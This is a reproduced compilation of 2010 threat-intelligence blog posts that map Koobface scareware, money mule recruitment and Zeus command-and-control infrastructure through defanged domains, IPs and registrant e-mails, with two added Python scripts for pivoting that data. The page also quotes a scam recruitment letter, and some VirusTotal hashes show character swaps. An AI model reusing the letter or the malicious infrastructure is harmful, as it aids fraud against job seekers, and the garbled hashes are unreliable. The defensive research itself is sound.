tube-porn-best .net - Email: robertsimonkroon@gmail.com
ekjsoft .eu - Email: robertsimonkroon@gmail.com
antispy-download .biz - Email: robertsimonkroon@gmail.com
soft-download-free .biz - Email: robertsimonkroon@gmail.com
scanner-virus-free .biz - Email: robertsimonkroon@gmail.com
free-malware-scan .biz - Email: robertsimonkroon@gmail.com
tube-best-porn .biz - Email: robertsimonkroon@gmail.com
tube-sex-porn .biz - Email: robertsimonkroon@gmail.com
download-free-files .biz - Email: michaeltycoon@gmail.com
scanner-free-virus .biz - Email: robertsimonkroon@gmail.com
download-free-soft .biz - Email: robertsimonkroon@gmail.com
tube-porn-best .biz - Email: robertsimonkroon@gmail.com
scan-your-pc-now .biz - Email: michaeltycoon@gmail.com
porn-tube-sex .biz - Email: robertsimonkroon@gmail.com
alrzsoft .in - Email: petrenko.kolia@yandex.ru
antispy-download .biz - Email: robertsimonkroon@gmail.com
cool-tube-porn .net - Email: robertsimonkroon@gmail.com
cool-tube-porn .org - Email: robertsimonkroon@gmail.com
download-free-now .net - Email: robertsimonkroon@gmail.com
download-free-now .org - Email: robertsimonkroon@gmail.com
download-free-soft .com - Email: robertsimonkroon@gmail.com
download-free-soft .net - Email: robertsimonkroon@gmail.com
download-scaner-free .com - Email: robertsimonkroon@gmail.com
ekjsoft .eu
fdglsoft .in - Email: petrenko.kolia@yandex.ru
free-virus-scanner .net - Email: robertsimonkroon@gmail.com
kleqsoft .in - Email: petrenko.kolia@yandex.ru
kltysoft .in - Email: petrenko.kolia@yandex.ru
ktyjsoft .in - Email: petrenko.kolia@yandex.ru
kyezsoft .in - Email: petrenko.kolia@yandex.ru
lkrjsoft .in - Email: petrenko.kolia@yandex.ru
lkrtsoft .in - Email: petrenko.kolia@yandex.ru
mgtlsoft .in - Email: petrenko.kolia@yandex.ru
porn-sex-tube .net - Email: robertsimonkroon@gmail.com
porn-sex-tube .org - Email: robertsimonkroon@gmail.com
scan-free-malware .net - Email: robertsimonkroon@gmail.com
scan-free-malware .org - Email: robertsimonkroon@gmail.com
spyware-scaner-free .com - Email: robertsimonkroon@gmail.com
spyware-scaner-free .info - Email: robertsimonkroon@gmail.com
spyware-scaner-free .net - Email: robertsimonkroon@gmail.com
spyware-scaner-free .org - Email: robertsimonkroon@gmail.com
tube-best-porn .biz - Email: robertsimonkroon@gmail.com
tube-best-porn .com - Email: robertsimonkroon@gmail.com
tube-best-porn .net - Email: robertsimonkroon@gmail.com
tube-best-porn .org - Email: robertsimonkroon@gmail.com
tube-porn-sex .info - Email: robertsimonkroon@gmail.com
tube-porn-sex .net - Email: robertsimonkroon@gmail.com
tube-porn-sex .org - Email: robertsimonkroon@gmail.com
What's so special about the robertsimonkroon@gmail.com email anyway?

It's the fact that not only was [25]the email once again used to register [26]scareware domains twice in July 2009, but also, as pointed out in November 2009's "[27]Koobface Botnet's Scareware Business Model - Part Two", the same email was used to register the following download locations for scareware domains pushed by the Koobface botnet:

0ni9ols3feu60 .cn - Email: robertsimonkroon@gmail.com
6j5aq93iu7yv4 .cn - Email: robertsimonkroon@gmail.com
mf6gy4lj79ny5 .cn - Email: robertsimonkroon@gmail.com
84u9wb2hsh4p6 .cn - Email: robertsimonkroon@gmail.com
6pj2h8rqkhfw7 .cn - Email: robertsimonkroon@gmail.com
7cib5fzf462g8 .cn - Email: robertsimonkroon@gmail.com
7bs5nfzfkp8q8 .cn - Email: robertsimonkroon@gmail.com
kt4lwumfhjb7a .cn - Email: robertsimonkroon@gmail.com
q2bf0fzvjb5ca .cn - Email: robertsimonkroon@gmail.com
rncocnspr44va .cn - Email: robertsimonkroon@gmail.com
tleayoft9226b .cn - Email: robertsimonkroon@gmail.com
4go4i9n76ttwd .cn - Email: robertsimonkroon@gmail.com
kzvi4iiutrlle .cn - Email: robertsimonkroon@gmail.com
hxc7jitg7k57e .cn - Email: robertsimonkroon@gmail.com
mfbj6pquvjv8e .cn - Email: robertsimonkroon@gmail.com
mt3pvkfmpi7de .cn - Email: robertsimonkroon@gmail.com
fb7pxcqyb45oe .cn - Email: robertsimonkroon@gmail.com
fyivbrl3b0dyf .cn - Email: robertsimonkroon@gmail.com
z6aiinvi94jgg .cn - Email: robertsimonkroon@gmail.com
ue4x08f5myqdl .cn - Email: robertsimonkroon@gmail.com
p7keflvui9fkl .cn - Email: robertsimonkroon@gmail.com
gjpwsc5p7oe3m .cn - Email: robertsimonkroon@gmail.com
fluqldfi3qkcm .cn - Email: robertsimonkroon@gmail.com
7mxlz5jq0nt3o .cn - Email: robertsimonkroon@gmail.com
3uxyctrlmiqeo .cn - Email: robertsimonkroon@gmail.com
p0umob9k2g7mp .cn - Email: robertsimonkroon@gmail.com
od32qjx6meqos .cn - Email: robertsimonkroon@gmail.com
bnfdxhaelrgey .cn - Email: robertsimonkroon@gmail.com
7zju2l82i2zhz .cn - Email: robertsimonkroon@gmail.com
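The registrant pivot the post performs by hand, spotting one contact e-mail across portfolios that were observed separately, is easy to automate. The Python below is an added example, not code from the original post or from its author: it parses records written in the post's own defanged "domain .tld - Email: address" form (with the optional hosting IP some entries carry), tags each record with the portfolio it came from, and reports every e-mail that ties two or more portfolios together. The sample records are a constructed subset of the page's entries, and the campaign labels are assumptions chosen for illustration.

```python
"""Pivot WHOIS registrant e-mails across separately observed domain portfolios."""
import re
from collections import defaultdict

# One record per line in the page's defanged form: "name .tld - Email: addr",
# optionally with a hosting IP between the domain and the e-mail.
RECORD_RE = re.compile(
    r"^(?P<domain>[\w-]+)\s*\.(?P<tld>[a-z]{2,})"    # "name .tld" or "name.tld"
    r"(?:\s*-\s*(?P<ip>\d{1,3}(?:\.\d{1,3}){3}))?"   # optional hosting IP
    r"\s*-\s*Email:\s*(?P<email>\S+@\S+)\s*$"
)

# Constructed sample: a few of the page's entries, keyed by the portfolio
# (campaign) each was observed in. Labels are illustrative assumptions.
SAMPLE_OBSERVATIONS = {
    "blackhat-seo/koobface portfolio at 212.150.164.190": [
        "antispy-download .org - Email: robertsimonkroon@gmail.com",
        "scan-your-pc-now .org - Email: michaeltycoon@gmail.com",
        "alrzsoft .in - Email: petrenko.kolia@yandex.ru",
    ],
    "koobface .cn download locations (Nov 2009)": [
        "0ni9ols3feu60 .cn - Email: robertsimonkroon@gmail.com",
        "7zju2l82i2zhz .cn - Email: robertsimonkroon@gmail.com",
    ],
    "scareware portfolio at 87.98.130.232": [
        "virus-scan-d.com - 87.98.130.232 - Email: test@now.net.cn",
        "inter-antivirus.com - 87.98.130.232 - Email: test@now.net.cn",
    ],
}


def parse_record(line):
    """Return (domain, ip_or_None, email) for one defanged line, or None if it does not parse."""
    m = RECORD_RE.match(line.strip())
    if not m:
        return None
    return f"{m['domain']}.{m['tld']}", m["ip"], m["email"].lower()


def pivot_by_email(observations):
    """Map each registrant e-mail to {campaign: [domains registered with it]}."""
    index = defaultdict(lambda: defaultdict(list))
    for campaign, lines in observations.items():
        for line in lines:
            rec = parse_record(line)
            if rec is None:          # skip entries without an e-mail, e.g. "ekjsoft .eu"
                continue
            domain, _ip, email = rec
            index[email][campaign].append(domain)
    return index


def cross_campaign_emails(observations, min_campaigns=2):
    """E-mails that tie together at least `min_campaigns` separately observed portfolios."""
    index = pivot_by_email(observations)
    return {email: dict(per_campaign)
            for email, per_campaign in index.items()
            if len(per_campaign) >= min_campaigns}


if __name__ == "__main__":
    for email, campaigns in cross_campaign_emails(SAMPLE_OBSERVATIONS).items():
        print(f"{email} links {len(campaigns)} portfolios:")
        for campaign, domains in campaigns.items():
            print(f"    {campaign} -> {', '.join(domains)}")
```

Feed it the full lists from this post and earlier ones, each under its own label, and the output is exactly the kind of link the paragraph above draws: a registrant contact reused across portfolios that were hosted on different infrastructure at different times.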

Stay tuned for a massive update on Koobface-related activities, analyzing the gang's multi-tasking throughout the entire January 2010 - descriptive historical OSINT offers long-term value when cross-checking for connections.

Related Koobface gang/botnet research: 

[28] How the Koobface Gang Monetizes Mac OS X Traffic 

[29] The Koobface Gang Wishes the Industry "Happy 
Holidays" 

[30] Koobface-Friendly Riccom LTD - AS29550 - (Finally) Taken 
Offline 

[31] Koobface Botnet Starts Serving Client-Side Exploits 

[32] Massive Scareware Serving Blackhat SEO, the Koobface 
Gang Style 

[33] Koobface Botnet's Scareware Business Model - Part Two 

[34] Koobface Botnet's Scareware Business Model - Part One 
[35] Koobface Botnet Redirects Facebook's IP Space to my Blog

[36] New Koobface campaign spoofs Adobe's Flash updater



[37] Social engineering tactics of the Koobface botnet 

[38] Koobface Botnet Dissected in a TrendMicro Report 

[39] Movement on the Koobface Front - Part Two 

[40] Movement on the Koobface Front 

[41] Koobface - Come Out, Come Out, Wherever You Are 

[42] Dissecting Koobface Worm's Twitter Campaign 

The Diverse Portfolio of Fake Security Software Series:

[43] A Diverse Portfolio of Fake Security Software - Part 
Twenty Four 

[44] A Diverse Portfolio of Fake Security Software - Part 
Twenty Three 

[45] A Diverse Portfolio of Fake Security Software - Part 
Twenty Two 

[46] A Diverse Portfolio of Fake Security Software - Part 
Twenty One 

[47] A Diverse Portfolio of Fake Security Software - Part 
Twenty 

[48] A Diverse Portfolio of Fake Security Software - Part 
Nineteen 

[49] A Diverse Portfolio of Fake Security Software - Part 
Eighteen 

[50] A Diverse Portfolio of Fake Security Software - Part 
Seventeen 



[51] A Diverse Portfolio of Fake Security Software - Part Sixteen

[52] A Diverse Portfolio of Fake Security Software - Part Fifteen

[53] A Diverse Portfolio of Fake Security Software - Part Fourteen

[54] A Diverse Portfolio of Fake Security Software - Part Thirteen

[55] A Diverse Portfolio of Fake Security Software - Part Twelve

[56] A Diverse Portfolio of Fake Security Software - Part Eleven

[57] A Diverse Portfolio of Fake Security Software - Part Ten

[58] A Diverse Portfolio of Fake Security Software - Part Nine




[59] A Diverse Portfolio of Fake Security Software - Part Eight 

[60] A Diverse Portfolio of Fake Security Software - Part Seven 

[61] A Diverse Portfolio of Fake Security Software - Part Six 

[62] A Diverse Portfolio of Fake Security Software - Part Five 

[63] A Diverse Portfolio of Fake Security Software - Part Four 

[64] A Diverse Portfolio of Fake Security Software - Part Three 

[65] A Diverse Portfolio of Fake Security Software - Part Two 

[66] Diverse Portfolio of Fake Security Software 

This post has been reproduced from [67]Dancho Danchev's blog. Follow him [68]on Twitter.

1. http://blogs.zdnet.com/security/?p=4297

2. http://en.wikipedia.org/wiki/Opportunity_cost

3. http://www.virustotal.com/analisis/bl57a41bcaf22d404785e2e4a7e0d235c9c5d5088f687772498f6eef5283e65e-1265147897

4. http://www.virustotal.com/analisis/8562070059a98634689e0a457a90b6cd93213efa595e6f33520ab233e5d6abll-1265308914

5. http://www.virustotal.com/analisis/8e4eld0382dda2c2f2ccc9ff9aab275b96fc91e978e6el901f81bd3e658cd9cf-1285333130

6. http://www.virustotal.com/analisis/3del601c9dd4fb69e079b9f451dad4bcc99b8566f95c9d6d88549262a32b5681-1265385013

7. http://www.virustotal.com/analisis/60b03b5b451bb4fla6c4be8c9997a806113c0832bfca04bedeea447699af6012-1265407256

8. http://www.virustotal.com/analisis/60b03b5b451bb4fla6c4be8c9997a806113c0832bfca04bedeea447699af6012-1265420621

9. http://www.virustotal.com/analisis/c5a59b3ee6b4da2fa9f5cb51bdf27dd59a560b3e857b6c2142e0bl546c66fec4-1265476116

10. http://www.virustotal.com/analisis/6ee2be84c8df4622de09f753b0032e4eb88ab7b862eb2dc98e3b924d3d513618-1265506080

11. http://www.virustotal.com/analisis/5122cef5ff65e00212c29c9d6b61a73d2cdc7004e76a75ebec44469464fceeb0-1265578417

12. http://www.virustotal.com/analisis/47351336cc4408d20d2431330a409b74369bebfd40b926eb23e4f4a65d9f7697-1265652899

13. http://www.virustotal.com/analisis/6640370dbabddlf206931588eafd9172566d0047b2c2857353148c70eba61046-1265823028

14. http://www.virustotal.com/analisis/3e289a5c06258aca2a21e6cb9bff670d21345250d4e7efde98f3769al7dfa6ef-1265845020

15. http://www.virustotal.com/analisis/d893e69082e5553d68816afc75990d2bcfc56fb0455f0689caac380dbb0720ce-1265908933

16. http://www.virustotal.com/analisis/99c63f4333fe748b59e040ba450d943da9836b5d3flb3612683d9fcbec5b75fd-12659

17. http://www.virustotal.com/analisis/47af520feea8efeec59325f7cdedl6af42b2cb459c34ddel21098e222332dblf-1266000454

18. http://www.virustotal.com/analisis/5a4a50d2e4al023a8b80f2fb2bb68b31ebbf71b6a5127018e9656da6a0cl0cfd-1266017625

19. http://www.virustotal.com/analisis/a7523cd6a95be9efbf7d2a225Iadeb0ebe032680f4323cc09065c740bbd18166-1266520546

20. http://www.virustotal.com/analisis/ab049035d0ca70b6679a5ddl38132e9bal95fcel3931ff44dl4259670423731f-1266797102

21. http://www.virustotal.com/analisis/3d6c89fl93b31c41c408300ebe006fd79239a401bcb70fe907605bb2af8c6de4-1266850664

22. http://www.virustotal.com/analisis/cff397f260e39d5fa326626eb7acde49938ed21clb52ac6ec70594595060e470-1266969210

23. http://www.virustotal.com/analisis/7feb701fce09c541669ee6ff9al696832459e4073119eeed76c82266fcdadbl5-1267037682

24. http://whois.domaintools.com/212.150.164.190

25. http://ddanchev.blogspot.com/2009/07/diverse-portfolio-of-fake-security.html

26. http://ddanchev.blogspot.com/2009/07/diverse-portfolio-of-fake-security_27.html

27. http://ddanchev.blogspot.com/2009/11/koobface-botnets-scareware-business.html

28. http://ddanchev.blogspot.com/2010/02/how-koobface-gang-monetizes-mac-os-x.html

29. http://ddanchev.blogspot.com/2009/12/koobface-gang-wishes-industry-happy.html

30. http://ddanchev.blogspot.com/2009/12/koobface-friendly-riccom-ltd-as29550.html

31. http://ddanchev.blogspot.com/2009/11/koobface-botnet-starts-serving-client.html

32. http://ddanchev.blogspot.com/2009/11/massive-scareware-serving-blackhat-seo.html

33. http://ddanchev.blogspot.com/2009/11/koobface-botnets-scareware-business.html

34. http://ddanchev.blogspot.com/2009/09/koobface-botnets-scareware-business.html

35. http://ddanchev.blogspot.com/2009/10/koobface-botnet-redirects-facebooks-ip.html

36. http://blogs.zdnet.com/security/?p=4594

37. http://content.zdnet.com/2346-12691_22-352597.html

38. http://ddanchev.blogspot.com/2009/10/koobface-botnet-dissected-in-trendmicro.html

39. http://ddanchev.blogspot.com/2009/08/movement-on-koobface-front-part-two.html

40. http://ddanchev.blogspot.com/2009/08/movement-on-koobface-front.html

41. http://ddanchev.blogspot.com/2009/07/koobface-come-out-come-out-wherever-you.html

42. http://ddanchev.blogspot.com/2009/07/dissecting-koobface-worms-twitter.html

43. http://ddanchev.blogspot.com/2009/12/diverse-portfolio-of-fake-security.html

44. http://ddanchev.blogspot.com/2009/07/diverse-portfolio-of-fake-security_27.html

45. http://ddanchev.blogspot.com/2009/07/diverse-portfolio-of-fake-security.html

46. http://ddanchev.blogspot.com/2009/06/diverse-portfolio-of-fake-security.html

47. http://ddanchev.blogspot.com/2009/05/diverse-portfolio-of-fake-security.html

48. http://ddanchev.blogspot.com/2009/04/diverse-portfolio-of-fake-security_16.html

49. http://ddanchev.blogspot.com/2009/04/diverse-portfolio-of-fake-security.html

50. http://ddanchev.blogspot.com/2009/03/diverse-portfolio-of-fake-security_31.html

51. http://ddanchev.blogspot.com/2009/03/diverse-portfolio-of-fake-security.html

52. http://ddanchev.blogspot.com/2009/02/diverse-portfolio-of-fake-security.html

53. http://ddanchev.blogspot.com/2009/01/diverse-portfolio-of-fake-security.html

54. http://ddanchev.blogspot.com/2008/11/diverse-portfolio-of-fake-security_12.html

55. http://ddanchev.blogspot.com/2008/11/diverse-portfolio-of-fake-security.html

56. http://ddanchev.blogspot.com/2008/10/diverse-portfolio-of-fake-security_28.html

57. http://ddanchev.blogspot.com/2008/10/diverse-portfolio-of-fake-security_22.html

58. http://ddanchev.blogspot.com/2008/10/diverse-portfolio-of-fake-security_16.html

59. http://ddanchev.blogspot.com/2008/10/diverse-portfolio-of-fake-security.html

60. http://ddanchev.blogspot.com/2008/09/diverse-portfolio-of-fake-security_30.html

61. http://ddanchev.blogspot.com/2008/09/diverse-portfolio-of-fake-security_24.html

62. http://ddanchev.blogspot.com/2008/09/diverse-portfolio-of-fake-security.html

63. http://ddanchev.blogspot.com/2008/08/diverse-portfolio-of-fake-security_25.html

64. http://ddanchev.blogspot.com/2008/08/diverse-portfolio-of-fake-security_20.html

65. http://ddanchev.blogspot.com/2008/08/diverse-portfolio-of-fake-security.html

66. http://ddanchev.blogspot.com/2007/12/diverse-portfolio-of-fake-security.html

67. http://ddanchev.blogspot.com/

68. http://twitter.com/danchodanchev


Keeping Money Mule Recruiters on a Short Leash - 
Part Two (2010-02-09 20:17) 

With [1]money mule recruitment syndicates continuing to expand their [2]geographically diverse inventories of gullible mules, keeping their operations on a short leash is becoming a tradition. What the non-existent organizations profiled in this post have in common with the non-existent organizations profiled before is the vendor of money mule recruitment creative, thanks to whose standardization of the recruitment process everyone willing to invest a modest amount of money can start recruiting.

Despite [3]the ongoing mix of [4]abusing legitimate infrastructure ([5]Web 2.0 services, dedicated hosting within legitimate ISPs - [6]Tweet 1; [7]Tweet 2; [8]Tweet 3; [9]Tweet 4; [10]Tweet 5; [11]Tweet 6) and using purely malicious infrastructure, centralization in cybercrime operations is still an inseparable part of the cybercrime ecosystem.

Case in point is [12]AS47560 - [13]VESTEH-NET-as Vesteh LLC, where the cybercriminals have chosen to host not only their money mule recruitment domain portfolio, but also the actual Zeus crimeware command and control servers. Pretty convenient indeed, but a minimalistic OPSEC attitude that leads to increased exposure.

The newly introduced money mule recruitment domains rely on the same DIY web interface and the same "payment processing agent" agreement seen in previous campaigns. What naturally changes is the web page layout, combined with a new description of the non-existent company. Here's a sample from the currently active ones:
"Welcome to the world of Outsourcing. Never has a phenomenon been so all encompassing and empowering like outsourcing. Transcending beyond an industry's vertical segments, outsourcing has become the "by default" strategy for all profit conscious organizations that struggle to retain their winning streak and high profitability. Today's scenario in the business world is more competitive than what it was in the past. There is a growing realization that wisdom lies in consolidating the core competency functions and outsourcing the supplement. We are an online services marketplace in USA and Australia. Our goal is to empower businesses with the absolute freedom to choose where to outsource their business needs to maximize their competitive advantage. We believe that "money saved due to outsourcing can be effectively and successfully utilized to focus more on strategic and core businesses functions".

The fact that money mule recruiters aggregate contact details from career-building web sites isn't new - see "[14]Major career web sites hit by spammers attack".

Here are the [15]sample letters emailed to a prospective money mule, who [16]spotted the scam and avoided it:
"After reviewing your resume online we have decided to 
propose you a Payment Processing Agent vacancy.

My name is Sarah Forbes and I'm working at SUCCESS Group Inc. Our company is a well-known one. It was founded in the USA and deals mainly with recruitment of IT professionals. The job we offer is a part-time position with a flexible schedule. On average the working hours are 2-3 hours a day (Monday through Friday). Our job requirements: Internet access and e-mail. Successful applicants are offered a probationary period (30 days). All agents get a training and online support. We evaluate the employees at least one week prior to the end of their trial period. NOTE: During the probationary period termination can be recommended by the supervisor.

The pay is $2,300 per month during the Trial Period + 8 % commission from each successfully handled payment. Total income is about $4,500 per month. After the first 30 days your base salary will be increased up to $3,000 a month. NOTE: After the probationary period you may request additional assignments or proceed a full-time. If you are interested in the offer, please, contact me at success.sarah.forbes@googlemail.com for the details.

First name: _
Last name: _
Country of residence: _
Contact phone: _
Preferred catime: _

Our representatives will reply within 48 hours. NOTE: This is not a sales position.

Sincerely,

Sarah Forbes
SUCCESS Group Inc
job@success-groupinc.tw
Phone: 1-585-267-5988
Fax: 1-585-672-6137"

Let's expose the domain portfolios in question. Hosting IP and the domain resolving to it:

91.200.164.18 - aurora-groupco.tw
91.200.164.21 - aurora-groupco.ws
91.200.164.19 - aurora-groupinc.tw
91.200.164.19 - aurora-groupinc.ws
91.200.164.19 - bear-groupco.ws
91.200.164.19 - bear-groupinc.ws
91.200.164.18 - citizen-groupco.tw
91.200.164.21 - citizen-groupco.ws
91.200.164.21 - citizen-groupsvc.tw
91.200.164.18 - citizengroupinc.ws
91.200.164.22 - classic-groupco.ws
91.200.164.20 - classic-groupsvc.tw
91.200.164.20 - classicgroupinc.ws
91.200.164.19 - excel-groupco.tw
91.200.164.19 - excel-groupinc.tw
91.200.164.19 - excel-groupinc.ws
91.200.164.18 - financial-groupco.tw
91.200.164.20 - financial-groupco.ws
91.200.164.22 - financial-groupinc.tw
91.200.164.20 - financial-groupsvc.ws
91.200.164.20 - market-vision.tw
91.200.164.19 - market-visioninc.ws
91.200.164.18 - measure-groupco.tw
91.200.164.18 - measure-groupco.ws
91.200.164.22 - measure-groupinc.tw
91.200.164.22 - measure-groupinc.ws
91.200.164.22 - millennium-groupco.tw
91.200.164.18 - millennium-groupinc.ws
91.200.164.20 - millennium-groupsvc.tw
91.200.164.18 - millennium-groupsvc.ws
91.200.164.21 - nuris-groupco.tw
91.200.164.21 - nuris-groupco.ws
91.200.164.20 - nuris-groupinc.tw
91.200.164.21 - nuris-groupinc.ws
91.200.164.21 - render-groupco.tw
91.200.164.21 - success-groupco.ws



Active money mule recruitment sites parked within AS47560 
- VESTEH-NET-as Vesteh LLC, at 91.200.164.18; 

91.200.164.19; 91.200.164.20; 91.200.164.21; and 
91.200.164.22 in particular: 

aurora-groupco .tw - Email: dodo@fastermail.ru
aurora-groupco .ws - Email: info@gtec.ru
aurora-groupinc .tw - Email: cents@qx8.ru
aurora-groupinc .ws - Email: info@gtec.ru
bear-groupco .ws - Email: info@gtec.ru
bear-groupinc .ws - Email: info@gtec.ru
citizen-groupco .tw - Email: sane@qx8.ru
citizen-groupco .ws - Email: info@gtec.ru
citizengroupinc .ws - Email: info@gtec.ru
citizen-groupsvc .tw - Email: frown@fastermail.ru
classic-groupco .ws - Email: info@gtec.ru
classicgroupinc .ws - Email: info@gtec.ru
classic-groupsvc .tw - Email: haste@fastermail.ru
excel-groupco .tw - Email: thaws@bigmailbox.ru
excel-groupinc .tw - Email: thaws@bigmailbox.ru
excel-groupinc .ws - Email: info@gtec.ru
financial-groupco .tw - Email: think@maillife.ru
financial-groupco .ws - Email: info@gtec.ru
financial-groupinc .tw - Email: sane@qx8.ru
financial-groupsvc .ws - Email: info@gtec.ru
market-vision .tw - Email: place@bigmailbox.ru
market-visioninc .ws - Email: info@gtec.ru
measure-groupco .tw - Email: cents@qx8.ru
measure-groupco .ws - Email: info@gtec.ru
measure-groupinc .tw - Email: cents@qx8.ru
measure-groupinc .ws - Email: info@gtec.ru
millennium-groupco .tw - Email: thaws@bigmailbox.ru
millennium-groupinc .ws - Email: info@gtec.ru
millennium-groupsvc .tw - Email: thaws@bigmailbox.ru
millennium-groupsvc .ws - Email: info@gtec.ru
nuris-groupco .tw - Email: rips@fastermail.ru
nuris-groupco .ws - Email: info@gtec.ru
nuris-groupinc .tw - Email: rips@fastermail.ru
nuris-groupinc .ws - Email: info@gtec.ru
render-groupco .tw - Email: muggy@freenetbox.ru
success-groupco .ws - Email: info@gtec.ru 
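The two lists above carry the pivots this kind of analysis runs on: the same registrant e-mail (info@gtec.ru, cents@qx8.ru, thaws@bigmailbox.ru) or the same hosting IP tying otherwise unrelated-looking domains into one operation. The following is an added example, not the post's own tooling, that parses both list formats as they appear on this page (defanged "domain .tld - Email:" lines and the alternating IP/domain layout) and inverts them into registrant and IP clusters. The sample lines are constructed with placeholder registrants and documentation-range IPs; the code assumes each IP line in the alternating list precedes the domain hosted on it, which is how the list above reads.

```python
"""Pivot a defanged IoC list on registrant e-mail and hosting IP, the way the
money mule recruitment list above ties domains together. Added example, not the
post's own tooling; the sample data is constructed in the page's format with
placeholder registrants and documentation IPs (192.0.2.0/24)."""
import re
from collections import defaultdict

# Constructed sample in the page's "domain .tld - Email: addr" format.
SAMPLE_EMAIL_LINES = """\
alpha-groupco .tw - Email: one@example.invalid
alpha-groupco ,ws - Email: shared@example.invalid
beta-groupinc .ws - Email: shared@example.invalid
gamma-groupsvc .tw - Email: two@example.invalid
delta-groupco .ws - Email: shared@example.invalid
"""

# Constructed sample of the alternating IP / domain layout that opens this post;
# the code assumes each IP line precedes the domain hosted on it.
SAMPLE_IP_LINES = """\
192.0.2.18

alpha-groupco.tw

192.0.2.20

alpha-groupco. ws

192.0.2.18

beta-groupinc.ws
"""

EMAIL_RE = re.compile(r"^(?P<domain>.+?)\s+-\s+Email:\s+(?P<email>\S+@\S+)\s*$")
IP_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def refang(domain):
    """'excel-groupco .ws', 'financial-groupco ,ws', 'measure-groupco. ws'
    -> 'excel-groupco.ws' etc. Handles only the defanging seen on this page."""
    return re.sub(r"\s*[.,]\s*", ".", domain.strip()).lower()


def parse_email_list(text):
    """{domain: registrant e-mail} from 'domain - Email: addr' lines."""
    out = {}
    for line in text.splitlines():
        m = EMAIL_RE.match(line.strip())
        if m:
            out[refang(m.group("domain"))] = m.group("email").lower()
    return out


def parse_ip_list(text):
    """{domain: ip} from the IP-then-domain layout; blank lines are ignored."""
    out, current_ip = {}, None
    for raw in text.splitlines():
        tok = raw.strip()
        if not tok:
            continue
        if IP_RE.match(tok):
            current_ip = tok
        elif current_ip is not None:
            out[refang(tok)] = current_ip
    return out


def pivot(mapping):
    """Invert {domain: key} into {key: sorted domains}."""
    inv = defaultdict(list)
    for dom, key in mapping.items():
        inv[key].append(dom)
    return {k: sorted(v) for k, v in inv.items()}


def shared_keys(mapping, min_domains=2):
    """Keys (registrant e-mails or IPs) tying together at least min_domains
    domains: the pivot points worth tracking or blocking as one cluster."""
    return {k: v for k, v in pivot(mapping).items() if len(v) >= min_domains}


def join_clusters(by_email, by_ip):
    """Per domain, registrant and hosting IP side by side, so a domain seen in
    only one of the two lists still shows up with the other field empty."""
    return {d: (by_email.get(d), by_ip.get(d))
            for d in sorted(set(by_email) | set(by_ip))}


if __name__ == "__main__":
    by_email = parse_email_list(SAMPLE_EMAIL_LINES)
    by_ip = parse_ip_list(SAMPLE_IP_LINES)
    for email, doms in shared_keys(by_email).items():
        print(f"registrant {email}: {', '.join(doms)}")
    for ip, doms in shared_keys(by_ip).items():
        print(f"host {ip}: {', '.join(doms)}")
    for dom, (email, ip) in join_clusters(by_email, by_ip).items():
        print(f"{dom:22} {email or '-':26} {ip or '-'}")
```

Pasting the page's own lists in place of the constructed samples works unchanged; the cluster keyed on info@gtec.ru is the one a blocklist would be built around, and raising min_domains in shared_keys filters out one-off registrants.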



Naturally, it gets even more interesting with AS47560 - VESTEH-NET-as Vesteh LLC, which acts as a good example of a cybercrime-friendly virtual neighborhood. Not only do the cybercriminals host the money mule recruitment sites there, but a decent number of Zeus crimeware C&Cs and client-side exploit serving campaigns are currently active there as well.

Zeus C&Cs active at [17]91.200.164.44, whose front pages return "dsfkgjk rgkj":

justinnew1 .com - Email: 3242dswewrf@yahoo.com
justinnew2 .com - Email: 3242dswewrf@yahoo.com
justinnew3 .com - Email: 3242dswewrf@yahoo.com
justinnew4 .com - Email: 3242dswewrf@yahoo.com
justinnew5 .com - Email: 3242dswewrf@yahoo.com
justinnew6 .com - Email: 3242dswewrf@yahoo.com
justinnew7 .com - Email: 3242dswewrf@yahoo.com
justinnew8 .com - Email: 3242dswewrf@yahoo.com
justinnew9 .com - Email: 3242dswewrf@yahoo.com
justinnew10 .com - Email: 3242dswewrf@yahoo.com
justinnew11 .com - Email: 3242dswewrf@yahoo.com
justinnew12 .com - Email: 3242dswewrf@yahoo.com
justinnew13 .com - Email: 3242dswewrf@yahoo.com
justinnew14 .com - Email: 3242dswewrf@yahoo.com
justinnew15 .com - Email: 3242dswewrf@yahoo.com
justinnew16 .com - Email: 3242dswewrf@yahoo.com
justinnew17 .com - Email: 3242dswewrf@yahoo.com
justinnew18 .com - Email: 3242dswewrf@yahoo.com
justinnew19 .com - Email: 3242dswewrf@yahoo.com
justinnew20 .com - Email: 3242dswewrf@yahoo.com
justinnew21 .com - Email: 3242dswewrf@yahoo.com
justinnew22 .com - Email: 3242dswewrf@yahoo.com
justinnew23 .com - Email: 3242dswewrf@yahoo.com
justinnew24 .com - Email: 3242dswewrf@yahoo.com

Historical OSINT of live exploit serving and malware phone back locations parked at 91.200.164.44:

abecedarian .in - Email: jobmasterx@yahoo.com
absinthial .in - Email: jobmasterx@yahoo.com
acarine .in - Email: jobmasterx@yahoo.com
aeruginous .in - Email: jobmasterx@yahoo.com
agrestic .in - Email: jobmasterx@yahoo.com
alveolate .in - Email: jobmasterx@yahoo.com
anaclastic .in - Email: jobmasterx@yahoo.com
anatine .in - Email: jobmasterx@yahoo.com
anconoid .in - Email: jobmasterx@yahoo.com
ancoral .in - Email: jobmasterx@yahoo.com
anserine .in - Email: jobmasterx@yahoo.com
archididascalian .in - Email: jobmasterx@yahoo.com
arietine .in - Email: jobmasterx@yahoo.com
babied .in - Email: jobmasterx@yahoo.com
baffled .in - Email: jobmasterx@yahoo.com
banal .in - Email: jobmasterx@yahoo.com
barren .in - Email: jobmasterx@yahoo.com
battle-worn .in - Email: jobmasterx@yahoo.com
bawled .in - Email: jobmasterx@yahoo.com
beatific .in - Email: jobmasterx@yahoo.com
beckoned .in - Email: jobmasterx@yahoo.com
betonomeshalkatraktor .in - Email: ynetsw@gmail.com
fcaliber65 .in - Email: wert32@rambler.ru
humpiiil .in - Email: wert32@rambler.ru
izyvecheniyOtragladit .in - Email: ynetsw@gmail.com
lifeberyt .in - Email: wert32@rambler.ru
marrychristmasforyou .com - ACTIVE
marrychristmasforyou .net - ACTIVE
my1stdomain .in - Email: wert32@rambler.ru
pingcrews .in - Email: jobmasterx@yahoo.com
razymniygluk .in - Email: ynetsw@gmail.com
rescservuce .in - Email: wert32@rambler.ru


[Routing graph image not reproduced; AS701 is the only legible label]



Name servers of notice:

dns1.yekt.net - 67.15.47.189
ns1.trythisok.cn - 89.248.166.45 - chunk@qx8.ru
ns1.basilkey.ws - 89.248.166.45 - info@gtec.ru
ns2.maninwhite.cc - 38.99.169.210 - duly@fastermail.ru
